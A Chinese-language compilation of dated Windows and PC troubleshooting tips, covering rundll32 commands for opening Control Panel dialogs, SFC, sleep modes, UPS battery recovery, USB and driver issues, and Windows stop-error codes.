     当然，Rundll的功能绝不仅仅是重启你的机器。其实，Rundll者，顾名思义，执行Dll也，它的功能就是以命令列的方式呼叫Windows的动态链结库，Rundll32.exe与Rundll.exe的区别就在於前者是呼叫32位的链结库，而後者是运用於16位的链结库，它们的命令格式是：

     RUNDLL.EXE ，，
     这里要注意三点：1.Dll档案名中不能含有空格，比如该档案位於c:\ProgramFiles\目录，你要把这个路径改成c:\Progra～1\；2.Dll档案名与Dll入口点间的逗号不能少，否则程式将出错并且不会给出任何资讯！3.这是最重要的一点：Rundll不能用来呼叫含返回值参数的Dll，例如Win32API中的GetUserName(),GetTextFace()等。在Visual Basic中，提供了一条执行外部程式的指令Shell,格式为：
     Shell “命令列”
     如果能配合Rundll32.exe用好Shell指令，会使您的VB程式拥有用其他方法难以甚至无法实现的效果：仍以重启为例，传统的方法需要你在VB工程中先建立一个模组，然後写入WinAPI的声明，最後才能在程式中呼叫。而现在只需一句:

     Shell “rundll32.exe user.exe,restartwindows”就搞定了！是不是方便多了？
     实际上，Rundll32.exe在呼叫各种Windows控制面板和系统选项方面有著独特的优势。下面，我就将本人在因特网上收集的有关Rundll的指令列举如下（很有用的，能省去你很多呼叫Windows　API的时间！！），供大家在程式设计中引用：
     命令列: rundll32.exe shell32.dll,Control_RunDLL
     功能: 显示控制面板
     命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,1
     功能: 显示“控制面板－辅助选项－键盘”选项视窗
     命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,2
     功能: 显示“控制面板－辅助选项－声音”选项视窗
     命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,3
     功能: 显示“控制面板－辅助选项－显示”选项视窗
     命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,4
     功能: 显示“控制面板－辅助选项－滑鼠”选项视窗
     命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,5
     功能: 显示“控制面板－辅助选项－传统”选项视窗
     命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl @1
     功能: 执行“控制面板－添加新硬体”向导。
     命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL AddPrinter
     功能: 执行“控制面板－添加新印表机”向导。
     命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,1
     功能: 显示 “控制面板－添加/删除程式－安装/卸载” 面板。
     命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,2
     功能: 显示 “控制面板－添加/删除程式－安装Windows” 面板。
     命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,3
     功能: 显示 “控制面板－添加/删除程式－启动盘” 面板。
     命令列: rundll32.exe syncui.dll,Briefcase_Create
     功能: 在桌面上建立一个新的“我的公文包”。
     命令列: rundll32.exe diskcopy.dll,DiskCopyRunDll
     功能: 显示复制软碟视窗
     命令列: rundll32.exe apwiz.cpl,NewLinkHere ％1
     功能: 显示“建立快捷方式”的对话框，所建立的快捷方式的位置由％1参数决定。
     命令列: rundll32.exe shell32.dll,Control_RunDLL timedate.cpl,,0
     功能: 显示“日期与时间”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL timedate.cpl,,1
     功能: 显示“时区”选项视窗。
     命令列: rundll32.exe rnaui.dll,RnaDial [某个拨号连接的名称]
     功能: 显示某个拨号连接的拨号视窗。如果已经拨号连接，则显示目前的连接状态的视窗。
     命令列: rundll32.exe rnaui.dll,RnaWizard
     功能: 显示“新建拨号连接”向导的视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,0
     功能: 显示“显示属性－背景”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,1
     功能: 显示“显示属性－萤屏保护”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,2
     功能: 显示“显示属性－外观”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,3
     功能: 显示显示“显示属性－属性”选项视窗。
     命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL FontsFolder
     功能: 显示Windows的“字体”档案夹。
     命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @3
     功能: 同样是显示Windows的“字体”档案夹。
     命令列: rundll32.exe shell32.dll,SHformatDrive
     功能: 显示格式化软碟对话框。
     命令列: rundll32.exe shell32.dll,Control_RunDLL joy.cpl,,0
     功能: 显示“控制面板－游戏控制器－一般”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL joy.cpl,,1
     功能: 显示“控制面板－游戏控制器－进阶”选项视窗。
     命令列: rundll32.exe mshtml.dll,PrintHTML (HTML文档)
     功能: 列印HTML文档。
     命令列: rundll32.exe shell32.dll,Control_RunDLL mlcfg32.cpl
     功能: 显示Microsoft Exchange一般选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @0
     功能: 显示“控制面板－滑鼠” 选项 。
     命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @1
     功能: 显示 “控制面板－键盘属性－速度”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @1,,1
     功能: 显示 “控制面板－键盘属性－语言”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @2
     功能: 显示Windows“印表机”档案夹。
     命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @3
     功能: 显示Windows“字体”档案夹。
     命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @4
     功能: 显示“控制面板－输入法属性－输入法”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL modem.cpl,,add
     功能: 执行“添加新调制解调器”向导。
     命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,0
     功能: 显示“控制面板－多媒体属性－音频”属性页。
     命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,1
     功能: 显示“控制面板－多媒体属性－视频”属性页。
     命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,2
     功能: 显示“控制面板－多媒体属性－MIDI”属性页。
     命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,3
     功能: 显示“控制面板－多媒体属性－CD音乐”属性页。
     命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,4
     功能: 显示“控制面板－多媒体属性－设备”属性页。
     命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl @1
     功能: 显示“控制面板－声音”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL netcpl.cpl
     功能: 显示“控制面板－网路”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL odbccp32.cpl
     功能: 显示ODBC32资料管理选项视窗。
     命令列: rundll32.exe shell32.dll,OpenAs_RunDLL {drive:\path\filename}

     功能: 显示指定档案(drive:\path\filename)的“打开方式”对话框。
     命令列: rundll32.exe shell32.dll,Control_RunDLL password.cpl
     功能: 显示“控制面板－密码”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL powercfg.cpl
     功能: 显示“控制面板－电源管理属性”选项视窗。
     命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL　PrintersFolder
     功能: 显示Windows“印表机”档案夹。(同rundll32.exe shell32.dll,Control_RunDLL　main.cpl @2)
     命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,0
     功能: 显示“控制面板－区域设置属性－区域设置”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,1
     功能: 显示“控制面板－区域设置属性－数字”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,2
     功能: 显示“控制面板－区域设置属性－货币”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,3
     功能: 显示“控制面板－区域设置属性－时间”选项视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,4
     功能: 显示“控制面板－区域设置属性－日期”选项视窗。
     命令列: rundll32.exe desk.cpl,InstallScreenSaver [萤屏保护档案名]
     功能: 将指定的萤屏保护档案设置为Windows的屏保，并显示萤屏保护属性视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,0
     功能: 显示“控制面板－系统属性－传统”属性视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,1
     功能: 显示“控制面板－系统属性－设备管理器”属性视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,2
     功能: 显示“控制面板－系统属性－硬体配置档案”属性视窗。
     命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,3
     功能: 显示“控制面板－系统属性－性能”属性视窗。
     命令列: rundll32.exe user.exe,restartwindows
     功能: 强行关闭所有程式并重启机器。
     命令列: rundll32.exe user.exe,exitwindows
     功能: 强行关闭所有程式并关机。
     命令列: rundll32.exe shell32.dll,Control_RunDLL telephon.cpl
     功能: 显示“拨号属性”选项视窗
     命令列: rundll32.exe shell32.dll,Control_RunDLL themes.cpl
     功能: 显示“桌面主旨”选项面板
     当然，不止是VisualBasic，象Delphi.VisualC＋＋等其他程式设计语言也可以通过呼叫外部命令的方法来使用Rundll的这些功能，具体方法这里就不再详细叙述了。灵活的使用Rundll,一定会使你的程式设计轻轻松松，达到事半功倍的效果！


SFC使用方法

《一键清理系统垃圾》

SFC使用方法

    SFC(System Files Checker，系统文件检查器)。以管理员身份登录Windows XP，将Windows XP的安装光盘放入光驱，在“命令提示符”窗口中键入“SFC/SCANNOW”命令后回车，“系统文件检查器”开始自动扫描系统文件，而且不需要你的任何干预。不过需要提醒大家的是，尽管Windows 2000/XP下的“SFC”比Windows 98下的“SFC”聪明得多，但要想正常运行它，还得注意以下两个问题：

    1.在运行“SFC”之前必须将Windows XP安装光盘放入光驱，否则在扫描过程中会提示你插入安装光盘。即使你插入了安装光盘，系统仍会有出错提示。
    2.在Windows 2000/XP下使用“系统文件检查器”时，必须加上正确的参数才能正常运行。我们可以在“命令提示符”窗口中键入“SFC”命令查看这些参数。
    3.由于Windows 2000/XP下的“SFC”命令是完全自动执行的，因此我们无法直接知道修复了哪些系统文件。不过我们可以通过以下方法间接获得系统文件的修复情况：依次打开“控制面板→管理工具→事件查看器→系统”，根据时间提示，从列表中选定运行“SFC”时的事件，右击该事件并查看其属性即可。


STD 与 STR

《一键清理系统垃圾》

STD 与 STR

    STD

    STR/STD功能都是电源管理和快速开机技术，利用这两项技术可以有效地节省能源并实现快速开机。STD（Suspend to Disk，休眠至硬盘）将当前系统状态保存到硬盘后，随后可以直接关机； 当再开机时不再重新加载操作系统，直接从硬盘恢复原来的状态，而不是正常系统的默认状态，从而缩短了开机和加载应用程序的时间。

    STR

    STR（Suspend to RAM，休眠至内存）与STD的不同是直接将保存的信息放在内存中，而不是硬盘。STR状态下电源只向内存和芯片组供电，其他部件都处于关机状态，这样可以大大地节省耗电；而在下次开机时，电脑可以在7秒钟左右时间内根据内存中保存的资料迅速地恢复到关机前的状态，这比STD快得多。与STD相比，STR对系统的要求要高得多，它并非是一种真正的关机状态，此时电源还向内存提供3.3V的电压，对芯片组也提供一个基本电压以保证在唤醒时可以对内存进行相应的操作。此时切不可对SDRAM进行插拔操作，也不可将电源关掉，否则将丢失数据而无法恢复到休眠前状态。STR首先需要主板支持，另外对电源、内存、显示卡等配件也有严格要求，任何不合适的配件都将导致不可预测的异常情况。

    STD对系统的要求最低，但是STD速度太慢，跟正常的关机操作差不多。而STR要更快、更实用一些，但对系统的要求非常严格。


UPS电池放电过量的恢复

《一键清理系统垃圾》

UPS电池放电过量的恢复

    故障现象：这是一台500VA山特牌UPS，STK商标，显然是正宗货。在没有输入交流电的情况下，开机无任何反应；如输入交流电，开机后机内出现“喳喳喳”的响声，红色指示灯微弱闪亮，有交流电输出，但极不稳定。
    分析与处理：此UPS是两年前购入的，近一年闲置未用，最近发现不能启动。据此分析，该故障可能是由于设备长时间闲置，电池长期缓慢放电造成放电过量，电压过低，使逆变器不能启动造成的。
    这是一台后备式UPS，内置两块电池，每块电池的标称电压为12伏，串连后为24伏。用万用表测电池组电压，仅仅13伏。测单块电池，每块电压为6.5伏。如输入交流电，发现机内的“喳喳喳”声是从电路板上的继电器发出的。据此看来，前面的分析是正确的。
    借来一台同型号的UPS，打开机箱，用导线将一块电池同坏的UPS的电池相串联，形成一个由三块电池组成的串联电池组。用万用表测该电池组电压，为22伏，再仔细检查连接线路，一切正常，接上交流电源，开机，UPS一声长鸣，绿色指示灯亮，有稳定的220伏交流输出。
    充电一个小时后试机，故障依旧，但故障电池电压略有上升，估计是UPS自带充电器功率太小。再开机充电10个小时。故障电池组电压达16伏，试机，还是不能正常工作，但“喳喳”声消失，改为报警声长鸣，红色指标灯长亮。由于没有说明书，依稀记得长鸣是报告电池电压不足。信心十足地充电24小时，故障电池组电压升至20伏以上。开机，绿色指标灯亮，一切重归正常，这台UPS就这样起死回生了。


USB存储设备无法识别

《一键清理系统垃圾》

USB存储设备无法识别

[color=Red]当你想用闪存或移动硬盘来和电脑交换数据时，但插上USB口时你却发现系统居然无法识别出USB设备，是什么原因造成的呢，这里我简单介绍一下排除USB存储设备本身故障后出现此类现象的原因。[/color]

[color=Blue]1.前置USB线接错。当主板上的USB线和机箱上的前置USB接口对应相接时把正负接反就会发生这类故障，这也是相当危险的，因为正负接反很可能会使得USB设备烧毁。

    2.USB接口电压不足。当把移动硬盘接在前置USB口上时就有可能发生系统无法识别出设备的故障。原因是移动硬盘功率比较大要求电压相对比较严格，前置接口可能无法提供足够的电压，当然劣质的电源也可能会造成这个问题。解决方法是移动硬盘不要接在前置USB接口上，更换劣质低功率的电源或尽量使用外接电源的硬盘盒，假如有条件的话。

    3.主板和系统的兼容性问题。呵呵这类故障中最著名的就是NF2主板与USB的兼容性问题。假如你是在NF2的主板上碰到这个问题的话，则可以先安装最新的nForce2专用USB2.0驱动和补丁、最新的主板补丁和操作系统补丁，还是不行的话尝试着刷新一下主板的BIOS一般都能解决。

    4.系统或BIOS问题。当你在BIOS或操作系统中禁用了USB时就会发生USB设备无法在系统中识别。解决方法是开启与USB设备相关的选项。


VIA 4合1常见问题集

《一键清理系统垃圾》

VIA 4合1常见问题集

一、如何正确安装4合1驱动程序

正确的安装方法应该是在重新安装windows之后，首先安装4合1驱动，然后安装声卡、显卡驱动、Modem以及网卡等硬件设备的驱动程序，最后再分别安装四个单独的驱动程序（VIA PCI IDE Busmaster、VIA AGP VxD 等），而且每安装完一个驱动都要重新启动电脑以便系统找到新的硬件。

二、为什么要使用VIA的4合1驱动程序

    在回答这个问题之前，让我们来了解一下驱动程序的概念。驱动程序是允许操作系统和系统中的硬件设备通信的程序文件，它的作用是告诉操作系统有哪些设备、具备哪些功能。通俗地说，驱动程序是让各电脑硬件正常工作的程序。

    VIA的4合1驱动程序的主要作用是用来增强使用VIA芯片组系统的稳定性、提高系统性能的系统驱动程序，它主要包括：①VIA Registry （INF）、②VIA AGP VxD、③VIA ATAPI Vendor Support、④VIA PCI IRQ Miniport等四个驱动。除了4合1的驱动程序包，VIA还提供了单独的IDE、AGP、IRQ以及INF驱动，方便用户各取所需。由于4合1驱动涉及到IDE、AGP等重要的系统核心部件，所以正确地安装和使用它是非常关键的。

三、网上有那么多的4合1版本，我该安装哪一个版本呢

    VIA的4合1驱动的更新频繁，尤其是在网上，流传着多种版本，有VIA官方认证版的，还有主板厂商在各自网站上公布的测试版本，不一而足。有的版本在性能方面表现出色一些，而有的版本在稳定性方面略胜一筹。如果你不是一个骨灰级的玩家，笔者建议你使用经过VIA认证的正式版本。其实，4.25版以后的各个版本之间的性能的差距非常小，所以应该着重于稳定性方面。笔者曾经使用过4.16版到目前最新的4.28版的4in1驱动，发现4.25和4.26版的驱动在性能和稳定性等方面的综合表现最为出色。如果你的主板的南桥芯片是686B而且硬盘支持ATA100模式，笔者建议你安装目前最新的4.28版，它可以让你的硬盘表现更出色。


Windows 9x“致命异常错误”的解决方案

《一键清理系统垃圾》

Windows 9x“致命异常错误”的解决方案

    相信大家的Windows 9x都曾遇到“莫名其妙”的“蓝屏”，并提示“致命的异常错误0E发生在......”，使其它正在运行的软件被迫中断，给自己带来很大的损失和麻烦，而自己又不知是何原因、如何排除，因此非常烦恼。下面我们就来分析一下其中的原因，并尽量找出适当的对策。
    要弄清楚出错原因，得从Windows 9x对内存的管理和使用谈起。我们知道，Windows 9x是32位操作系统，对内存具有32位寻址能力，可以发挥80386以上CPU所具有的保护模式功能，为每个应用程序提供独立的4GB地址空间，但事实上，这远远超过了目前大部分PC机的内存容量，这就造成了有4GB地址空间，而无真正物理内存与之对应的问题。于是，Windows 9x便利用CPU的虚拟内存能力，把硬盘的一部分当作内存(硬盘交换文件)来使用，即通常所说的虚拟内存(见图)。现在很多用户配置的硬盘容量一般都较大，这下似乎有了用不完的内存，不会发生内存不够的情况了。其实不然，首先，能作虚拟内存的必须是硬盘上的空余空间，而且这些被分若干块的空间连续长度必须是512K的整数倍，才能被用作虚拟内存;第二，CPU在RAM存取数据的速度远远快于RAM与硬盘交换数据的速度。这样，有时就会发生应用程序存取当前不在RAM中而在交换文件中数据的情况，这时，CPU就会产生异常错误0E(也称为页面异常)，但此时屏幕上不会有任何提示，Windows 9x尝试继续运行，只有当应用程序存取数据的地址或者将要跳转到的地址根本就没有分配RAM或虚拟内存时(即出现页面无效)，Windows 9x才显示“异常错误发生......”，这下它真不行了，提示用户中止程序运行。
    引起该错误的原因很多，相应有不同的处理方法：
    1.CPU超频。这是最近很多人电脑发生上述故障的一个重要原因。超频提高了CPU的工作频率，同时也使其性能变得不稳定，尤其是在炎热的夏季，这个问题暴露得更加明显。究其原因，CPU在RAM存取数据的速度本来就快于RAM与硬盘交换数据的速度，超频使这种矛盾更加突出，同时由于气温升高，构成CPU等电子元器件材料的指标参数也发生微妙变化，加剧了在RAM或虚拟内存中找不到需要数据的情况，这样就会出现“异常错误”。解决办法：降低频率，使CPU工作在规定的正常频率，同时使用“降温”软件，清扫CPU风扇等。
    2.硬盘剩余空间太少或碎片太多。前面已经谈到，硬盘上能作虚拟内存的必须是自由空间，而且空间连续长度必须是512K的整数倍。如果你的硬盘还只有几百MB，出现“异常错误”与此很可能有关，当然，就算硬盘容量再大，隔一段时间进行一次碎片整理也是非常必要的。
    3.Windows启动的程序过多。系统资源消耗殆尽，使个别程序需要的数据在内存或虚拟内存中找不到，也会出现异常错误。解决办法：不要同时启动过多的程序，一个简单的监测方法是，随时打开Windows各窗口上“帮助”→“关于...”，看系统资源还剩多少，低于60%就应该小心了，不要再启动新的程序、打开新的窗口了。万一因此发生“异常错误”，只需重新启动系统就正常了。顺便说一句，有的朋友喜欢“Shift + 重新启动计算机”，虽然重新启动的速度较快，但系统资源并不能完全释放，所以本人建议大家还是以正常方式重新启动计算机。
    4.系统冲突。经常遇到的是由于声卡或显卡的设置冲突，引起异常错误。此外，其它设备的中断、DMA或端口出现冲突的话，可能导致少数驱动程序产生异常，甚至无法正常启动Windows 9x。解决办法：以“安全模式”启动，在“控制面板→系统→设备管理”中进行适当调整，一般可以解决。对于在驱动程序中产生异常错误的情况，可以修改注册表。选择“开始/运行”，键入“Regedit”，进入注册表编辑器,通过菜单下的“查找”功能，找到并删除与驱动程序前缀字符串相关的所有“主键”和“键值”，重新启动。
    5.程序设计问题。部分程序在编制时内存分配不合理（Windows的Bug都不少），完成后又未经过严格测试，在特殊的运行条件下就会因找不到内存分配地址而频频出错。还有，编制时考虑不周，程序只适用于特殊型号、种类的硬件，如果遇到其它硬件时也会出错。顺便说一句，一些盗版软件因解密过程中破坏、丢失了部分源代码，也常常导致“异常错误”的发生。因此，还是用正版软件的好，以免前功尽弃。
    6.版本冲突。多数应用程序都要调用特定版本的动态链接库DLL或者OLE组件，如果在安装某个软件时，旧版本的DLL覆盖了新版本的DLL，或者删除应用程序时，误删了有用的DLL文件，就可能使上述调用失败，从而引起“异常错误”。遇到这种情况，解决的办法，自然就是找到新版文件。“找”的方法较多，可以直接从光盘上某个软件中、游戏中拷贝，或者用Windows 9x(包括OSR2版)光盘中的Extract这个小工具，直接从CAB压缩文档找到并解压出所需文件。
    7.注册表错误。注册表是Windows 9x的“命根子”，其中保存有Windows 9x及应用程序的重要数据，即使是哪个细小地方出了问题，都很可能引发“致命异常错误”的发生，甚至可能引起系统崩溃。因此，在你估计到操作可能引起它的变动以前(如安装一个新软件)，先对其进行备份是很有必要的，一旦发生错误，可以恢复注册表，否则，要么请专业人士修复注册表，要么重新安装Windows 9x及你的其它程序，那麻烦就真的有点大了。
    8.软硬件不兼容。常遇到的是，BIOS或驱动程序太旧，以致不能很好支持硬件，导致“异常错误”的发生。如果你的主板支持BIOS升级，尽量升级到最新版本，同样，尽量找到与你设备配套的最新的设备驱动程序，也可以减少错误的发生。
    9.BIOS设置。众所周知，是否正确设置BIOS，是电脑能否正常运行的关键。其中硬盘及内存等的参数设置尤为重要，弄不好，就有可能出现程序存取数据失败，而导致“异常错误”的发生。其实，现在多数主板BIOS有“硬盘实用程序”一项，它可以检测并存储硬盘的各项参数，通常使用这些检测值是安全的。但对于较老的硬盘，有必要对一些较新的设置进行屏蔽(如硬盘的32位模式等)。至于内存，要注意一、二级缓存以及影子内存的设置。实在有困难，对于BIOS的设置，可以请行家帮忙，这样，不仅正确，而且可能更加优化。
    10.硬件老化或存在故障。如现在有人还在用的540M硬盘，其转速仅为3600转/分钟左右，假如用在PⅢ、PC133 SDRAM、133外频主板这样的配置上，快马拉破车，出现“异常错误”的可能性自然较大。此外，少数不法商人在给顾客组装兼容机时，使用质量低劣的板卡、内存，有的甚至出售冒牌主板和Remark过的CPU、内存，这样的机器在运行Windows 9x时很不稳定，发生“异常致命错误”在所难免。因此，用户购机时应擦亮自己的眼睛，最好带个内行参谋，并用一些较新的工具软件(如Hwinfo、Norton等)测试电脑，长时间连续烤机(如72小时)，以及争取尽量长的保修时间等。
    从上面可以看出，Windows 9x发生异常错误的原因的确是多种多样的，上面不一定已经列举完了，各自的解决办法也有所不同。实际当中，有时候，如果真要弄清此类故障的“来龙去脉”，其实是比较困难的，遇到这种情况，除了上面谈到的各种相关解决方法外，可以试试重装软件，甚至重装系统，如果仍然时常发生“异常错误”，可能你应该与软件设计者，或者硬件经销商联系了。


Windows 2003常见故障解决方法

《一键清理系统垃圾》

Windows 2003常见故障解决方法

    Windows 2003推出已经有一段时间了，相信有不少朋友正在使用它。不过，由于Windows 2003是针对服务器的需求而开发的，对声卡、显卡等硬件的默认设置做了处理，因此个人用户在使用时经常会碰到一些“故障”，当然，解决起来并不困难。

    1． 播放电影时画面粗糙

    很多朋友有这样的“遭遇”：自己的电脑配置相当高，安装了Windows 2003时显卡也能够被自动识别并安装，可是播放电影时画面非常粗糙，安装最新版显卡驱动后画面质量依然如故。其实这是因为Windows 2003默认的显示选项没有根据个人用户的需要进行优化所致。

    ★解决方法：在桌面上单击右键，依次进入“显示属性→设置→高级→疑难解答”，将“硬件加速”游标向右拖至“完全”，再单击“确定”退出。然后依次进入“开始→所有程序→附件→系统工具→系统信息”，选择“工具→DirectX诊断工具”(由于程序搜集系统信息，所以需要稍微等待一下，可能出现闪屏)，选择“显示”选项卡，依次启用“DirectDraw Acceleration”和“Direct3D Acceleration”项，再单击“退出”即可。

    2． 声卡不工作或者声音严重滞后

    在Windows 2003中，多数声卡都能继续使用它们在Windows 2000/XP中的驱动程序，而较老的声卡（如帝盟S90等）驱动就只有手工安装了。安装好声卡驱动以后，在Windows 2003标准版中可以正常发声，但在企业版中，系统还是不能发声，或是在玩游戏时声音严重滞后。

    ★解决方法：依次进入“控制面板→声音和音频控制设备”，勾选“音频服务”选项，单击“确定”。再进入“DirectX诊断工具”，选择“声音”选项卡，在“加速级别”中将游标向右拖动到“完全加速”，单击“退出”，最后重新启动计算机即可。

    3． IE总是提醒存在安全隐患

    “总觉得最新的版本最安全，没想到在Windows 2003下浏览网页时，每访问一个页面，IE都会提醒存在安全隐患，询问是否继续访问，太不方便了”，经常有朋友这样抱怨。出现这个问题的原因是Windows 2003中的IE默认安全级别是“高”，这样虽然安全性得以提高，但却给我们日常上网带来许多麻烦。

    ★解决方法：启动IE，选择“工具→Internet选项”，在“安全”选项卡中将安全级别设为“中”。

    4． 运行大型软件时系统反应迟缓

    服务器和工作站对系统资源的要求是不相同的，如果我们平时要运行诸如Photoshop、3DSMAX等软件，则应当将系统资源重新分配，修改为类似Windows XP的状态。

    ★解决方法：进入“控制面板→系统”选择“高级”选项卡，在“性能”栏里点“设置”按钮，选择“高级”选项卡，在“处理器计划”和“内存使用”两栏中均选择“程序”，最后点“确定”并重新启动计算机即可。


Windows常见错误代码解析

《一键清理系统垃圾》

Windows常见错误代码解析

Windows常见非法操作详解

■.停止错误编号:0x0000000A

说明文字RQL-NOT-LESS-OR-EQUAL

通常的原因:驱动程序使用了不正确的内存地址.

解决方法:如果无法登陆,则重新启动计算机.当出现可用的作系统列表时,按F8键.在Windows高级选项菜单屏幕上,选择"最后一次正确的配置",然后按回车键.

检查是否正确安装了所有的新硬件或软件.如果这是一次全新安装,请与硬件或软件的制造商联系,获得可能需要的任何Windows更新或驱动程序.

运行由计算机制造商提供的所有的系统诊断软件,尤其是内存检查.

禁用或卸掉新近安装的硬件(RAM,适配器,硬盘,调制解调器等等),驱动程序或软件.

确保硬件设备驱动程序和系统BIOS都是最新的版本.

确保制造商可帮助你是否具有最新版本,也可帮助你获得这些硬件.

禁用 BIOS内存选项,例如cache或shadow.

■.停止错误编号:0x0000001E

说明文字:KMODE-EXPTION-NOT-HANDLED

通常的原因:内核模式进程试图执行一个非法或未知的处理器指令.

解决方法:确保有足够的空间,尤其是在执行一次新安装的时候.

如果停止错误消息指出了某个特定的驱动程序,那么禁用他.如果无法启动计算机.应试着用安全模式启动,以便删除或禁用该驱动程序.

如果有非

Microsoft支持的视频驱动程序,尽量切换到标准的VGA驱动程序或Windows提供的适当驱动程序.

禁用所有新近安装的驱动程序.

确保有最新版本的系统BIOS.硬件制造商可帮助确定你是否具有最新版本,也可以帮助你获得他.

BIOS内存选项,例如cache,shadow.

■.停止错误编号:0x00000023或0x00000024

说明文字:FAT-FILE-SYSTEM或MTFS-FILE-SYSTEM

通常原因:问题出现在Ntfs.sys(允许系统读写NTFS驱动器的驱动程序文件)内.

解决方法:运行由计算机制造商提供的系统诊断软件,尤其是硬件诊断软件.

禁用或卸载所有的反病毒软件,磁盘碎片整理程序或备份程序.

通过在命令提示符下运行Chkdsk /f命令检查硬盘驱动器是否损坏,然后重新启动计算机.

■.停止编号:0x0000002E

说明文字ATA-BUS-ERROR

通常的原因:系统内存奇偶校验出错,通常由硬件问题导致.

解决方法:卸掉所有新近安装的硬件(RAM.适配器.硬盘.调制解调器等等).

运行由计算机制造商提供的系统诊断软件,尤其是硬件诊断软件.

确保硬件设备驱动程序和系统BIOS都是最新版本.

使用硬件供应商提供的系统诊断,运行内存检查来查找故障或不匹配的内存.

禁用BIOS内存选项,例如cache或shadow.

在启动后出现可用作系统列表时,按F8.在Windows高级选项菜单屏幕上,选择"启动VGA模式:.然后按回车键.如果这样做还不能解决问题,可能需要更换不同的视频适配器列表,有关支持的视频适配器列表,请参阅硬件兼容性列表.

■.停止编号:0x0000003F

说明文字:NO-MOR-SYSTEM-PTES

通常的原因:每哟正确清理驱动程序.

解决方法:禁用或卸载所有的反病毒软件，磁盘碎片处理程序或备份程序.

■:停止错误编号:0x00000058

说明文字:FTDISK-INTERN-ERROR

通常的原因:容错集内的某个主驱动器发生故障.

解决方法:使用Windows安装盘启动计算机,从镜象(第2)系统驱动器引导.有关如何编辑Boot.ini文件以指向镜象系统驱动器的指导,可在MIcrosoft支持服务Web站点搜索"Edit

ARC path".

■.停止错误编号:0x0000007B

说明文字NACCESSI-BLE-BOOT-DEVICE

通常原因:初始化I/O系统(通常是指引导设备或文件系统)失败.

解决方法:引导扇区病毒通常会导致这种停止错误.是用反病毒软件的最新版本,检查计算机上是否有存在病毒.如果找到病毒,则必须执行必要的不找把他从计算机上清除掉,请参阅反病毒软件文档了解如何执行这些步骤.

卸下所有新近安装的硬件(RAM,适配器,调制解调器等等).

核对MIcrosoft硬件兼容性列表以确保所有的硬件和驱动程序都与Windows兼容.

如果使用的适SCSI适配器,可以从硬件供应商除获得最新WINDOWS驱动程序,禁用SCSI设备的同步协商,检查该SCSI链是否终结,并核对这些设备的SCSI

ID,如果无法确定如何执行能够这些步骤,可参考硬件设备的文档.

如果你用的是IDE设备,将板上的IDE端口定义为唯一的主端口.核对IDE设备的主/从/唯一设置.卸掉除硬盘之外的所有IDE设备.如果无法确认如何执行这些不找，可参考硬件文档.

如果计算机已使用NTFS文件系统格式化,可重新启动计算机,然后在该系统分区上运行Chkdsk

/f/r命令.如果由于错误而无法启动系统,那么使用命令控制台,并运行Chkdsk /r命令.

运行Chkdsk

/f命令以确定文件系统是否损坏.如果Windows不能运行Chkdsk命令,将驱动器移动到其他运行Windows的计算机上,然后从这台计算机上对该驱动器运行Chkdsk命令.

■.停止错误编号:0x0000007F

说明文字:UNEXPECTED-KERNEL-MODE-TRAP

通常的原因:通常是由于硬件或软件问题导致,但一般都由硬件故障引起的.

解决方法:核对Microsoft硬件兼容性列表以确保所有的硬件和驱动程序都与Windows兼容.如果计算机主板不兼容就会产生这个问题.

卸掉所由新近安装的硬件.

运行由计算机制造商提供的所有系统诊断软件,尤其是内存检查.

禁用BIOS内存选项,例如cache或shadow.

■.停止错误编号:0x00000050

说明文字AGE-FAULT-IN-NONPAGED-AREA

通常的原因:内存错误(数据不能使用分页文件交换到磁盘中).

解决方法:卸掉所有的新近安装的硬件.

运行由计算机制造商提供的所有系统诊断软件.尤其是内存检查.

